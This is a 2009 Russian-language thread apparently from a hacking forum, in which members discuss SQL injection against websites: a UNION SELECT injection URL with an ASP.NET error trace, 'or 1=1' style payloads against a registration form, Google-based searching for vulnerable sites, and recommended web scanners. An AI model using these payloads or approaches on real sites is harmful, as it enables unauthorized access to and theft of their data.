28.11.2009, 14:30
|
|
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
С нами:
8728261
Репутация:
211
|
|
2Strilo4ka
как по мне сайт нормально защищен (он очень простой, там практически ничего нет)
|
|
|
28.11.2009, 14:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 Strilo4ka:
Там просто креш на сайте, ты же забил просто фамилию в строке поиска? Так вот, твоя ссылка ничем не отличается от такой:
Код:
http://www.phones.mk.ua/?fio=123
и от любой другой фамилии. Чо ты там словить хочешь? |
|
|
|
28.11.2009, 18:48
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
ты, наверное, удивишься, но там есть сайт.
Выдержка из правил раздела:
НЕ разрешается: просьбы о взломе, реклама, просьбы о поиске багов.
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
28.11.2009, 21:40
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Нашел скул на MSSQL Jet подобрал количество полей
http://localhost/script.aspx?id=1+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17+from+articles#
брутил таблицу и некоторых нашел, но чтоб брутит колонок и взят инфо принтабелных полей не выводит:
Server Error in '/' Application. String was not recognized as a valid DateTime. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Exception Details: System.FormatException: String was not recognized as a valid DateTime. Source Error: An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below. Stack Trace: [FormatException: String was not recognized as a valid DateTime.] System.DateTimeParse.Parse(String s, DateTimeFormatInfo dtfi, DateTimeStyles styles) +2835862 System.Convert.ToDateTime(String value, IFormatProvider provider) +72 System.String.System.IConvertible.ToDateTime(IForm atProvider provider) +10 System.Data.Common.DateTimeStorage.Set(Int32 record, Object value) +74 System.Data.DataColumn.set_Item(Int32 record, Object value) +51 [ArgumentException: String was not recognized as a valid DateTime.Couldn't store <14> in adate Column. Expected type is DateTime.] System.Data.DataColumn.set_Item(Int32 record, Object value) +90 System.Data.DataTable.NewRecordFromArray(Object[] value) +227 System.Data.DataTable.LoadDataRow(Object[] values, Boolean fAcceptChanges) +82 System.Data.ProviderBase.SchemaMapping.LoadDataRow () +83 System.Data.Common.DataAdapter.FillLoadDataRow(Sch emaMapping mapping) +91 System.Data.Common.DataAdapter.FillFromReader(Data Set dataset, DataTable datatable, String srcTable, DataReaderContainer dataReader, Int32 startRecord, Int32 maxRecords, DataColumn parentChapterColumn, Object parentChapterValue) +164 System.Data.Common.DataAdapter.Fill(DataSet dataSet, String srcTable, IDataReader dataReader, Int32 startRecord, Int32 maxRecords) +353 System.Data.Common.DbDataAdapter.FillInternal(Data Set dataset, DataTable[] datatables, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +164 System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) +287 System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, String srcTable) +92 newswire.viewarticle.Page_Load(Object sender, EventArgs e) +180 System.Web.UI.Control.OnLoad(EventArgs e) +99 System.Web.UI.Control.LoadRecursive() +50 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
Возможно ли как нибудь взят имена колонок? |
|
|
|
28.11.2009, 23:37
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 5
С нами:
8837012
Репутация:
0
|
|
такой вопрос а как лучше искать уязвимости :
искать дыры в известных движках а потом загугливать сайты на этих двигах или есть спец софт который сканирует сайты и выводит сайты с возможными багами?
|
|
|
|
28.11.2009, 23:53
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
С нами:
8842000
Репутация:
43
|
|
[Google Source Code: Поиск багов в исходниках.]
Представлены ссылки для поиска бажного кода.
[1]- GoogleCodeSearch
[2]- GoogleSearch
http://cipher.org.uk/ideas/bugle/
Юзаем , ищем баги, хекоем 
Последний раз редактировалось LzD; 28.11.2009 в 23:57..
|
|
|
|
28.11.2009, 23:44
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
если очень надо взломат тот или иной ресурс, надо юзат сканеры тоже но и самому искать в движке ресурса баг. Часто сканеры пропускають дыри
|
|
|
|
28.11.2009, 23:59
|
|
Новичок
Регистрация: 27.07.2009
Сообщений: 5
С нами:
8837012
Репутация:
0
|
|
а сканеры какие можете посоветовать?
|
|
|
|
29.11.2009, 00:04
|
|
Banned
Регистрация: 24.07.2009
Сообщений: 85
С нами:
8842000
Репутация:
43
|
|
Сообщение от SLITES
а сканеры какие можете посоветовать?
http://sectools.org/web-scanners.html
PS Acunetix весьма не плох
|
|
|
|
29.11.2009, 01:45
|
|
Новичок
Регистрация: 28.11.2009
Сообщений: 1
С нами:
8658555
Репутация:
0
|
|
уже писал раз но тема куда-то пропала(
вообщем вопрос
есть сайт где форма регистрации проверяет уникальность имени
так вот такие запросы
?username=vasja' or '1'='1
?username=vasja' or 1=1
?username=vasja' or '1'='1'
приводят к ошыбке 403
если же запрос писать так
?username=vasja' or '1'='2
?username=vasja' or 1=2
?username=vasja' or '1'='2'
то просто выдает сообщение что неверное имя
, я так понимаю єто потенцыальная инекция, только не могу понять почему она проходит и с кавычками и без
Как такое может быть?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
